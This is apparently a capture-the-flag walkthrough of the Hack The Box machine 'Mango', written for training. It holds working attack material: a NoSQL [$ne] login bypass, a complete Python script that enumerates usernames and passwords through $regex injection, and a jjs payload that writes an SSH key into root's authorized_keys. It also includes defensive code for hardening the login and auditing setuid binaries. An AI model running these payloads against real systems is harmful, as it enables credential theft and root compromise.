Mango HTB
IP
10.10.10.162
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.162 | cut -d"/" -f1 | tr '\n' ','
We have the following ports open on the machine:
22,80,443
Let's run a more in-depth scan of the target:
sudo nmap -sCV -p22,80,443 -oA nmap_results 10.10.10.162
results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn:
|_ http/1.1
|_http-title: Mango | Search Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
We can see:
SSH is running on the target
Both HTTP and HTTPS are running on the target
Most likely an Ubuntu machine
Looks like we have a domain name and a hostname:
mango.htb
staging-order.mango.htb
We will add these to our hosts file.
Let's check out port 443 first.

Looks like some kind of search engine.
Let's get feroxbuster running and see if we can find anything:
feroxbuster -u https://mango.htb:443 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -k -o dirs.txt
results
200 GET 216l 514w 5152c https://mango.htb/index.php
200 GET 15331l 41447w 397607c https://mango.htb/analytics.php
200 GET 216l 514w 5152c https://mango.htb/
Looking at the SSL certificate we can see the following:

We can see an email address:
admin@mango.htb
We could test this search base for injection attacks using sqlmap. First, let's catch a request with Burp and save the request to a file, then run sqlmap on the saved request:
sqlmap -r r.txt --batch --force-ssl --level=5
HTTP
When we check out staging-order.mango.htb, we can see a login screen.

Let's bust out feroxbuster and see if we can find anything:
feroxbuster -u http://staging-order.mango.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs_http.txt
Nothing interesting.
Let's catch the login request with Burp.

Let's save this as a file and run sqlmap; we want to find out whether this login is vulnerable to any kind of injection attack:
sqlmap -r login.req --batch
Nothing interesting.
I'm going to take a guess and say this web application utilises Mongo NoSQL, given the name of the box and, well, the pictures of the mangos.
Let's run with this. First we need to check whether this is indeed vulnerable to an injection attack.
Here is a blog that explains this better than I could.
Alright, we have the login request in Burp; we send that over to Repeater.

Now, what we can do to bypass authentication is the following:

Notice the [$ne]: this is a common operator within NoSQL meaning 'not equal to'. We are now essentially saying
username is not equal to 'shrek123'
password is not equal to 'shrek123'
Because both of these statements are true, we are authenticated to the page.

Not much here.
Since we know we have an injection point within the login prompt, maybe we can dump some passwords. We can utilise the $regex filter; for example, we can check whether the first letter of the user admin's password is x:
username=username&password[$regex]=^x.*&login=login
Now let's create a Python script to brute force the usernames and passwords:
import sys
import string
import requests


class MangoBruteForcer:
    def __init__(self, url):
        # Constructor to initialise the class with the target URL
        self.url = url

    def brute_password(self, user):
        # Brute-force the password for a given username, one character at a time
        password = ""
        while True:
            extended = False
            # Iterate over each character in the ASCII letters, digits and punctuation
            for c in string.ascii_letters + string.digits + string.punctuation:
                # Skip regex metacharacters that would change the meaning of the pattern
                if c in ["*", "+", ".", "?", "|", "\\"]:
                    continue
                # Display the current password attempt in the console
                sys.stdout.write(f"\r[+] Password: {password}{c}")
                sys.stdout.flush()
                # Send a POST request with the username and the current password regex
                resp = requests.post(
                    self.url,
                    data={
                        "username": user,
                        "password[$regex]": f"^{password}{c}.*",
                        "login": "login",
                    },
                )
                # Check if the response indicates the prefix matched
                if "We just started farming!" in resp.text:
                    # Prefix matched: extend the password and try a real login with it
                    password += c
                    extended = True
                    resp = requests.post(
                        self.url,
                        data={"username": user, "password": password, "login": "login"},
                    )
                    # Check if the full password logs in
                    if "We just started farming!" in resp.text:
                        # Print the found password and return from the function
                        print(f"\r[+] Found password for {user}: {password.ljust(20)}")
                        return
                    # Start again from the first character for the next position
                    break
            if not extended:
                # No character matched: the next character is outside our alphabet, so stop
                print(f"\r[-] Stuck on password for {user}: {password.ljust(20)}")
                return

    def brute_user(self, res):
        # Brute-force the username and call brute_password once a full name is found
        found = False
        for c in string.ascii_letters + string.digits:
            # Display the current username attempt in the console
            sys.stdout.write(f"\r[*] Trying Username: {res}{c.ljust(20)}")
            sys.stdout.flush()
            # Send a POST request with the current username regex
            resp = requests.post(
                self.url,
                data={
                    "username[$regex]": f"^{res}{c}",
                    "password[$gt]": "",
                    "login": "login",
                },
            )
            # Check if the response indicates a username with this prefix exists
            if "We just started farming!" in resp.text:
                found = True
                self.brute_user(res + c)
        if not found:
            print(f"\r[+] Found user: {res.ljust(20)}")
            self.brute_password(res)


if __name__ == "__main__":
    try:
        target_url = "http://staging-order.mango.htb/"
        brute_forcer = MangoBruteForcer(target_url)
        initial_user = ""
        brute_forcer.brute_user(initial_user)
    except Exception as e:
        print(f"Error: {e}")
Now let's run this script:

We have two users and their associated passwords:
[+] Found user: admin
[+] Found password for admin: t9KcS3>!0B#2
[+] Found user: mango
[+] Found password for mango: h3mXK8RhU~f{]f5H
[*] Trying Username: 9
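Before moving on, an added example (not code from the write-up or from the box itself) of why the [$ne] bypass and the [$regex] enumeration above work, and what the fix on the server side looks like. The user record, the toy query matcher and both handler functions are constructed for illustration; only the request shapes come from the write-up.

```python
# Added example, not code from the write-up or the box: a constructed model of
# the login handler showing why the [$ne] and [$regex] requests succeed and what
# the server-side fix looks like. USERS, _matches, find_one and both login_*
# functions are illustrative assumptions; only the request shapes are from the
# write-up.
import re
from urllib.parse import parse_qsl

# Constructed user record standing in for the site's Mongo collection.
USERS = [{"username": "admin", "password": "correct horse battery staple"}]


def parse_form(body):
    """Parse a form body the way PHP does: the key 'password[$ne]' becomes a
    nested array, so {'password': {'$ne': 'x'}} is what reaches the application."""
    form = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"(\w+)\[([^\]]+)\]", key)
        if m:
            form.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            form[key] = value
    return form


def _matches(doc_value, cond):
    """Minimal stand-in for Mongo's matcher: a plain value is an equality test,
    a dict is read as operators. Only the three used on this box are modelled."""
    if not isinstance(cond, dict):
        return doc_value == cond
    if doc_value is None:
        return False
    ops = {
        "$ne": lambda v, a: v != a,
        "$gt": lambda v, a: v > a,
        "$regex": lambda v, a: re.search(a, v) is not None,
    }
    # An operator we do not model simply fails to match.
    return all(op in ops and ops[op](doc_value, arg) for op, arg in cond.items())


def find_one(query):
    """Return the first user document matching every field in the query."""
    for doc in USERS:
        if all(_matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Hands the parsed fields straight to the query, which is what lets the
    operator objects become part of the filter."""
    form = parse_form(body)
    query = {"username": form.get("username"), "password": form.get("password")}
    return find_one(query) is not None


def login_hardened(body):
    """Refuses any field that is not a plain string before it can reach the
    query. The rejection is also the detection point: log it."""
    form = parse_form(body)
    user, password = form.get("username"), form.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        return False  # reject: operator object supplied where a string was expected
    return find_one({"username": user, "password": password}) is not None


if __name__ == "__main__":
    bypass = "username[$ne]=shrek123&password[$ne]=shrek123&login=login"
    probe = "username=admin&password[$regex]=^c.*&login=login"
    for name, body in [("bypass", bypass), ("regex probe", probe)]:
        print(f"{name}: vulnerable={login_vulnerable(body)} hardened={login_hardened(body)}")
```

In PHP the equivalent guard is an is_string() check on each field before the filter is built (or casting the fields to strings). Two further points matter for the defender: the enumeration script above depends on the "We just started farming!" page being distinguishable from a failed login, so the rejection path should return the same generic failure page as a wrong password; and a burst of login requests carrying operator-shaped field names from one source is the signature of exactly that script, which is why the rejection should be logged rather than silently dropped.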
Let's see if we can SSH into the machine:
ssh mango@10.10.10.162
We have an SSH session as mango.

If we look within the home directory we can see both admin and mango.

Let's see if we can switch our user to admin, using the admin password we found:
su admin
We are admin, but we don't have sudo privileges on the machine.

When we search for SUID files:
find / -type f -perm /4000 2>/dev/null
We do find something interesting:
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
What we can do is write to a file (/root/.ssh/authorized_keys), drop an SSH key into it and SSH in as root. To do this, let's generate some keys:
mkdir .ssh
ssh-keygen

Let's create an exploit script using the knowledge from GTFOBins. We need the location of the authorized_keys file (/root/.ssh/authorized_keys) and our public key so it can be written there:
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa <your-public-key-here>");
fw.close();' | jjs
Copy and paste the exploit into our SSH session.

Let's give our private key the necessary permissions and SSH into the machine as root:
chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.162
We are now root.
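The root step came down to one setuid bit that should never have been set. As an added example (not part of the write-up), here is the audit a defender would schedule on a host: enumerate setuid binaries the same way the find command above does and flag anything outside a known-good baseline. The BASELINE set and the sample scan result are constructed for illustration; the jjs path is the one found on this box.

```python
# Added example, not part of the write-up: audit setuid binaries against a
# known-good baseline and report newcomers such as the jjs binary on this box.
# BASELINE and the sample scan below are constructed for illustration.
import os
import stat

# Constructed baseline (assumption): the setuid binaries an image is expected to
# carry. Build the real one from a freshly provisioned host, not by hand.
BASELINE = {
    "/bin/mount",
    "/bin/ping",
    "/bin/su",
    "/bin/umount",
    "/usr/bin/passwd",
    "/usr/bin/sudo",
}


def find_suid(root="/"):
    """Walk the filesystem and return regular files with the setuid bit set.
    This is the Python equivalent of: find / -type f -perm /4000 2>/dev/null"""
    hits = []
    # onerror swallows permission errors, the same role 2>/dev/null plays above
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(found, baseline=BASELINE):
    """Return the setuid files that are not in the baseline: each one is either
    drift from the image or, as with jjs here, a privilege-escalation path."""
    return sorted(set(found) - set(baseline))


if __name__ == "__main__":
    # Constructed sample standing in for a real scan result on the Mango box
    sample_scan = sorted(BASELINE | {"/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs"})
    for path in unexpected_suid(sample_scan):
        print(f"[!] unexpected setuid binary: {path}")
    # On a live host, replace sample_scan with find_suid() run as root.
```

Anything the audit reports gets the bit stripped with chmod u-s (jjs has no reason to run setuid; it is a script interpreter, which is exactly why GTFOBins lists it), and the baseline is re-checked whenever a package update touches a setuid path.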
